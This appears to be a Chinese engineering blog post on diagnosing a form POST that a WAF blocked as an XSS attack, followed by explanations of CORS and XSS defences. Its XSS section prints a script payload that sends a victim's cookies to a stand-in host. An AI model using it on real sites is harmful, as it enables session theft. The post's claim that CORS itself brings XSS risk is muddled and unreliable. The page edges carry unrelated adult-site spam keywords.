国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

層層剖析一次 HTTP POST 請求事故

網絡 網絡管理
本文主要講述的是如何根據公司網絡架構和業務特點,鎖定正常請求被誤判為跨域的原因并解決。

作者 | vivo 互聯網服務器團隊- Wei Ling

本文主要講述的是如何根據公司網絡架構和業務特點,鎖定正常請求被誤判為跨域的原因并解決。

一、問題描述

某一個業務后臺在表單提交的時候,報跨域錯誤,具體如下圖:

從圖中可看出,報錯原因為HTTP請求發送失敗,由此,需先了解HTTP請求完整鏈路是什么。

HTTP請求一般經過3個關卡,分別為DNS、Nginx、Web服務器,具體流程如下圖:

  • 瀏覽器發送請求首先到達當地運營商DNS服務器,經過域名解析獲取請求 IP 地址
  • 瀏覽器獲取 IP 地址后,發送HTTP請求到達Nginx,由Nginx反向代理到Web服務端
  • 最后,由web服務端返回相應的資源

了解HTTP基本請求鏈路后,結合問題,進行初步調查,發現此form表單是application/json格式的post提交。同時,此業務系統采用了前后端分離的架構方式(頁面域名和后臺服務域名不同 ), 并且在Nginx已經配置跨域解決方案。基于此,我們進行分析。

二、問題排查步驟

第一步:自測定位

既然是form表單,我們采用控制變量法,嘗試對每一個字段進行修改后提交測試。在多次試驗后,鎖定表單中的moduleExport 字段的變化會導致這個問題。

考慮到moduleExport字段在業務上是一段JS代碼,我們嘗試對這段JS代碼進行刪除/修改,發現:當字段moduleExport中的這段js代碼足夠小的時候,問題消失。

基于上述發現,我們第一個猜想是:會不會是HTTP響應方的請求body大小限制導致了這個問題。

第二步:排查 HTTP 請求 body 限制

由于采用前后端分離,真實的請求是由 XXX.XXX.XXX 這個內網域名代表的服務進行響應的。而內網域名的響應鏈如下:

那么理論上,如果是HTTP請求body的限制,則可能發生在 LVS 層或者Nginx層或者Tomcat。我們一步步排查:

首先排查LVS層。若LVS層故障,則會出現網關異常的問題,返回碼會為502。故此,通過抓包查看返回碼,從下圖可看出,返回碼為418,故而排除LVS異常的可能

其次排查Nginx 層。Nginx層的HTTP配置如下:

我們看到,在Nginx層,最大支持的HTTP請求body為50m, 而我們這次事故的form請求表單,大約在2M, 遠小于限制, 所以:不是Nginx 層HTTP請求body的限制造成的。

然后排查 Tomcat 層,查看 Tomcat 配置:

我們發現, Tomcat 對于最大post請求的size限制是-1, 語義上表示為無限制,所以: 不是 Tomcat 層HTTP請求body的限制造成的。

綜上,我們可以認為:此次問題和HTTP請求body的大小限制無關。

那么問題來了,如果不是這兩層導致的,那么還會有別的因素或者別的網絡層導致的嗎?

第三步:集思廣益

我們把相關的運維方拉到了一個群里面進行討論,討論分兩個階段

【第一階段】

運維方同學發現 Tomcat 是使用容器進行部署的,而容器和nginx層中間,存在一個容器自帶的nameserver層——ingress。我們查看ingress的相關配置后,發現其對于HTTP請求body的大小限制為3072m。排除是ingress的原因。

【第二階段】

安全方同學表示,公司為了防止XSS攻擊,會對于所有后臺請求,都進行XSS攻擊的校驗,如果校驗不通過,會報跨域錯誤。

也就是說,理論上完整的網絡層調用鏈如下圖:

并且從WAF的工作機制和問題表象上來看,很有可能是WAF層的原因。

第四步:WAF 排查

帶著上述的猜測,我們重新抓包,嘗試獲取整個HTTP請求的optrace路徑,看看是不是在WAF層被攔截了,抓包結果如下:

從抓包數據上來看,status為complete代表前端請求發送成功,返回碼為418,而optrace中的ip地址經查詢為WAF服務器ip地址。

綜上而言,form表單中的moduleExport字段的變化很可能導致在WAF層被攔截。而出現問題的moduleExport字段內容如下:

module.exports = {
"labelWidth": 80,
"schema": {
"title": "XXX",
"type": "array",
"items":{
"type":"object",
"required":["key","value"],
"properties":{
"conf":{
"title":"XXX",
"type":"string"
},
"configs":{
"title":"XXX",
"type":"array",
"items":{
......
config: {
......
validator: function(value, callback) {
// 至少填寫一項
if(!value || !Object.keys(value).length) {
return callback(new Error('至少填寫一項'))
}

callback()
}
}
......
}

我們進行一個字段一個字段排查后,鎖定

module.exports.items.properties.configs.config.validator字段會觸發WAF的攔截機制:請求包過WAF模塊時會對所有的攻擊規則都會進行匹配,若屬于高危風險規則,則觸發攔截動作。

三、 問題分析

整個故障的原因,是業務請求的內容觸發了WAF的XSS攻擊檢測。那么問題來了

  • 為什么需要WAF
  • 什么是XSS攻擊

在說明XSS之前,先得說清楚瀏覽器的跨域保護機制

3.1 跨域保護機制

現代瀏覽器都具備‘同源策略’,所謂同源策略,是指只有在地址的:

  • 協議名 HTTPS,HTTP
  • 域名
  • 端口名

均一樣的情況下,才允許訪問相同的cookie、localStorage或是發送Ajax請求等等。若在不同源的情況下訪問,就稱為跨域。而在日常開發中,存在合理的跨域需求,比如此次問題故障對應的系統,由于采用了前后端分離,導致頁面的域名和后臺的域名必然不相同。那么如何合理跨域便成了問題。

常見的跨域解決方案有:IFRAME, JSONP, CORS三種。

  • IFRAME 是在頁面內部生成一個IFRAME,并在IFRAME內部動態編寫JS進行提交。用到此技術的有早期的EXT框架等等。
  • JSONP 是將請求序列化成一個string,然后發起一個JS請求,帶上string。此做法需要后臺支持,并且只能使用GET請求。在當前的業內已經廢除此方案。
  • CORS 協議的應用比較廣泛,并且此次出事故的系統是采用了CORS進行前后端分離。那么,什么是CORS協議呢?

3.2 CORS協議

CORS(Cross-Origin Resource Sharing)跨源資源分享是解決瀏覽器跨域限制的W3C標準(官方文檔),其核心思路是:在HTTP的請求頭中設置相應的字段,瀏覽器在發現HTTP請求的相關字段被設置后,則會正常發起請求,后臺則通過對這些字段的校驗,決定此請求是否是合理的跨域請求。

CORS協議需要服務器的支持(非服務器的業務進程), 比如 Tomcat 7及其以后的版本等等。

對于開發者來說,CORS通信與同源的AJAX通信沒有差別,代碼完全一樣。瀏覽器一旦發現AJAX請求跨源,就會自動添加一些附加的頭信息,有時還會多出一次附加的請求,但用戶不會有感覺。

因此,實現CORS通信的關鍵是服務器(服務器端可判斷,讓哪些域可以請求)。只要服務器實現了CORS協議,就可以跨源通信。

雖然CORS解決了跨域問題,但引入了風險,如XSS攻擊,因此在到達服務器之前需加一層Web應用防火墻(WAF),它的作用是:過濾所有請求,當發現請求是跨域時,會對整個請求的報文進行規則匹配,如果發現規則不匹配,則直接報錯返回(類似于此次案例中的418)。

整體流程如下:

不合理的跨域請求,我們一般認為是侵略性請求,這一類的請求,我們視為XSS攻擊。那么廣義而言的XSS攻擊又是什么呢?

3.3 XSS 攻擊機制

XSS為跨站腳本攻擊(Cross-Site Scripting)的縮寫,可以將代碼注入到用戶瀏覽的網頁上,這種代碼包括 HTML 和 JavaScript。

例如有一個論壇網站,攻擊者可以在上面發布以下內容:

<script>location.href="http://domain.com/?c=" + document.cookiescript>

之后該內容可能會被渲染成以下形式:

<p><script>location.href="http://domain.com/?c=" + document.cookie</script></p>

另一個用戶瀏覽了含有這個內容的頁面將會跳轉到 domain.com 并攜帶了當前作用域的 Cookie。如果這個論壇網站通過 Cookie 管理用戶登錄狀態,那么攻擊者就可以通過這個 Cookie 登錄被攻擊者的賬號了。

XSS通過偽造虛假的輸入表單騙取個人信息、顯示偽造的文章或者圖片等方式可竊取用戶的 Cookie,盜用Cookie后就可冒充用戶訪問各種系統,危害極大。

下面給出2種XSS防御機制。

3.4 XSS 防御機制

XSS防御機制主要包括以下兩點:

3.4.1 設置 Cookie 為 HTTPOnly

設置了 HTTPOnly 的 Cookie 可以防止 JavaScript 腳本調用,就無法通過 document.cookie 獲取用戶 Cookie 信息。

3.4.2 過濾特殊字符

例如將 < 轉義為&lt;,將> 轉義為&gt;,從而避免 HTML 和 Jascript 代碼的運行。

富文本編輯器允許用戶輸入 HTML 代碼,就不能簡單地將 < 等字符進行過濾了,極大地提高了 XSS 攻擊的可能性。

富文本編輯器通常采用 XSS filter 來防范 XSS 攻擊,通過定義一些標簽白名單或者黑名單,從而不允許有攻擊性的 HTML 代碼的輸入。

以下例子中,form 和 script 等標簽都被轉義,而 h 和 p 等標簽將會保留。

<h1 id="title">XSS Demo</h1>

<p>123</p>

<form>
<input type="text" name="q" value="test">
</form>

<pre>hello</pre>

<script type="text/javascript">
alert(/xss/);
</script>
<h1>XSS Demo</h1>

<p>123</p>

轉義后:

<h1>XSS Demo</h1>

<p>123</p>

&lt;form&gt;
&lt;input type="text" name="q" value="test"&gt;
&lt;/form&gt;

<pre>hello</pre>

&lt;script type="text/javascript"&gt;
alert(/xss/);
&lt;/script&gt;

四、問題解決

在確定問題后,讓安全團隊修改WAF的攔截規則后,問題消失。

最后,對此問題進行總結。

五、問題總結

縱覽整個排查過程,最耗費資源的工作集中于問題定位:到底是哪個模塊出現了問題。而定位模塊的最大難點在于:對于網絡全鏈路的不了解(之前并不知曉WAF層的存在)。

那么,針對類似的問題,我們后面應該如何去加速問題的解決呢?我認為有兩點需要注意:

  • 采用控制變量法, 精準定位到問題的邊界——什么時候能出現,什么時候不能出現。
  • 熟悉每一個模塊的存在,以及每一個模塊的職責邊界和風險可能。

下面來逐個解釋:

5.1 確定問題邊界

我們在一開始,確定是form表單導致的問題后,我們就逐個字段進行修改驗證,最終確定其中某個字段導致的現象。在定位到具體的問題發生地后,由將之前鎖定的字段進行拆解,逐步分析字段中每個屬性,從而最終確定XX屬性的值觸犯了WAF的規則機制。

5.2 定位模塊錯誤

在此案例中,跨域拒絕的故障主要是網絡層,那么我們就必須要摸清楚整個業務服務的網絡層次結構。然后對每一層的情況進行分析。

  • 在Nginx層,我們對配置文件進行分析
  • 在ingress層,我們對其中的配置規則進行分析
  • 在Tomcat層,我們對server.xml的屬性進行分析

總結而言,我們必須熟悉每一個模塊的職責,并且知曉如何判斷每一個模塊是否在整個鏈路中正常工作,只有基于此,我們才能將問題原因的范圍逐步縮小,從而最后獲得答案。

責任編輯:未麗燕 來源: vivo互聯網技術
相關推薦

2020-08-24 07:34:39

網絡超時請求

2025-03-11 08:48:35

JVMOOM事故

2025-02-24 12:00:00

開發SpringBootJava

2021-03-05 22:41:55

CDH集群CDH集群

2019-01-16 09:20:42

架構設計JVM FullGC宕機事故

2021-04-13 08:54:28

dubbo線程池事故排查

2023-01-16 14:49:00

MongoDB數據庫

2020-11-16 12:35:25

線程池Java代碼

2022-06-06 11:31:31

MySQL數據查詢

2022-07-11 13:58:14

數據庫業務流程系統

2022-07-12 17:03:43

鴻蒙網絡請求庫

2017-11-09 09:06:29

流量暴增優化

2022-09-07 09:09:13

高并發架構

2020-09-25 07:57:42

生產事故系統

2022-11-16 08:00:00

雪花算法原理

2023-07-28 14:32:33

QtPOST請求

2018-11-14 15:00:08

HTTP程序員前端

2022-10-25 18:00:00

Redis事務生產事故

2022-10-10 17:52:08

CPUERP系統

2020-10-21 12:10:30

訂單號Java代碼
點贊
收藏

51CTO技術棧公眾號

亚洲美女中文字幕| 欧美成人高清视频| 国产一区二区视频免费在线观看| 欧美日韩第一| 亚洲剧情一区二区| 国产主播福利在线| 国产一区二区精品久久99| 国产精品视频地址| 欧美爱爱视频| 亚洲韩国欧洲国产日产av| 日韩欧美在线观看一区二区| 26uuu欧美| 天天综合中文字幕| 精品91在线| 成人乱色短篇合集| 亚洲欧洲国产精品一区| 亚洲人成在线观看| 波多野结衣在线观看| 欧美偷拍一区二区| 最新在线地址| 一区二区三区不卡在线观看| av免费网站观看| 99久久精品国产观看| 小泽玛利亚av在线| 久久久久久黄| 蜜桃91精品入口| 激情综合自拍| 亚洲影院污污.| 欧美hd在线| 国产精品嫩草影院一区二区| 狼人天天伊人久久| 久久久爽爽爽美女图片| 日本免费成人| 久久久91精品国产| 精品一区91| 九九视频这里只有精品| 国产一区二区高清在线| 久久精品国产视频| 日韩免费精品| 欧美激情精品久久久久久变态| 久久亚洲国产精品尤物| 中文字幕亚洲国产| 日韩免费在线电影| 欧美成人免费在线观看| 精品三级久久久| 久久欧美在线电影| 亚洲97av| 成人黄色影片在线| 欧美特黄a级高清免费大片a级| 粉嫩av一区二区三区免费观看| 亚洲国产日韩欧美在线| 亚洲一区二区免费在线| 激情久久一区| 欧美在线激情| 国产精品2024| 日日碰狠狠躁久久躁婷婷| 国产精品乱子久久久久| 神马午夜dy888| 欧美丝袜第一区| 亚洲成a人v欧美综合天堂麻豆| 欧美精选午夜久久久乱码6080| 最新超碰在线| 亚洲色图综合网| 91久久精品无嫩草影院| 国产91精品久久久久久| 香蕉视频国产精品| 日本视频精品一区| 成人黄色在线视频| 国产成人综合美国十次| 欧美日韩色婷婷| 欧美性受ⅹ╳╳╳黑人a性爽| 中日韩午夜理伦电影免费| 国产精品玖玖玖在线资源| 成人一区二区电影| 日韩成人免费看| 18禁男女爽爽爽午夜网站免费| 综合分类小说区另类春色亚洲小说欧美 | 久久久综合香蕉尹人综合网| 麻豆一区二区三| 男女超爽视频免费播放| 一区二区久久久| 国产写真视频在线观看| 日韩在线观看网址| 国产精品一国产精品| 欧美日韩在线一二三| 99精品一区二区三区| 中文字幕在线二区| 亚洲免费av电影| 欧美一区二区性| 欧美性受xxxx黑人猛交88| 亚洲欧美日本在线| 搞黄网站在线看| 日本a级片电影一区二区| 亚洲综合另类| juliaann成人作品在线看| 制服丝袜国产精品| www.国产精品一区| 久久精品国产精品国产精品污 | 成人区精品一区二区不卡| 在线观看免费高清视频97| 久久精品高清| 欧美成人精品免费| 色综合天天做天天爱| 国产福利一区二区三区在线播放| 亚洲xxxxx性| 久久蜜桃一区二区| 色女人在线视频| 国产精品久久激情| 成人黄色777网| 午夜视频成人| 热草久综合在线| 国产成+人+日韩+欧美+亚洲| 高清日韩av电影| 久久免费在线观看| 国产又粗又猛又爽又黄91精品| 亚洲sss视频| 欧美激情一区二区三区久久久 | 欧美一区 二区| 在线不卡视频一区二区| 日韩欧美一区二区三区久久| 国产美女精品视频免费播放软件 | 亚洲r级在线视频| 免费一级欧美在线观看视频| 好吊色欧美一区二区三区视频| 国产亚洲成aⅴ人片在线观看| 欧洲黄色一区| 成人在线观看av| 亚洲九九爱视频| 亚洲精品三区| 国产手机视频在线观看| 欧美久久一二区| 婷婷成人基地| 久久国产这里只有精品| 日韩电影免费观看在线观看| 欧美日本不卡| 一级视频在线观看视频在线啦啦| 欧美国产激情18| 不卡视频一二三四| 女人让男人操自己视频在线观看 | 精品国产乱码久久久久久蜜柚 | 亚洲成人va| 翔田千里亚洲一二三区| 日本精品一区二区三区四区的功能| 人人精品亚洲| av无码精品一区二区三区| 亚洲午夜激情免费视频| 久久电影网电视剧免费观看| 中文字幕有码在线视频| 蜜桃av噜噜一区二区三区| 精品视频在线看| 在线观看视频日韩| 超碰在线国产| 精品视频在线观看| 在线视频欧美精品| 欧美精品首页| fc2在线中文字幕| 国产欧美精品一区二区三区| 一本久久综合亚洲鲁鲁五月天| 国产精品久久观看| 水中色av综合| 999在线观看免费大全电视剧| 精品日本美女福利在线观看| 色天天综合网| 深夜福利视频在线免费观看| 亚洲综合色激情五月| 午夜精品成人在线| 国产精品激情电影| 国产超级va在线视频| 天天人人精品| 亚洲少妇激情视频| 91香蕉国产在线观看软件| 91免费精品国偷自产在线在线| 蜜臀av免费观看| 国产成人精品久久亚洲高清不卡| 亚洲电影一区二区三区| 国产精品v日韩精品v欧美精品网站| 福利片在线观看| 三区精品视频| 正在播放欧美一区| 中文无字幕一区二区三区 | 亚洲欧洲日产国产网站| 精品视频在线播放免| 国产盗摄精品一区二区三区在线| 欧美成人家庭影院| 向日葵污视频在线观看| 国产精品久久婷婷六月丁香| 欧美视频在线不卡| 麻豆精品一区二区综合av| 最新日韩一区| www.成人精品免费网站青椒| 91久久中文字幕| 精品国产三级电影在线观看| 99久久久久久| 日韩久久精品| 色婷婷在线播放| 免费黄色福利视频| 91久久久国产精品| 亚洲精品www| 国产精品乱子久久久久| 亚洲国产mv|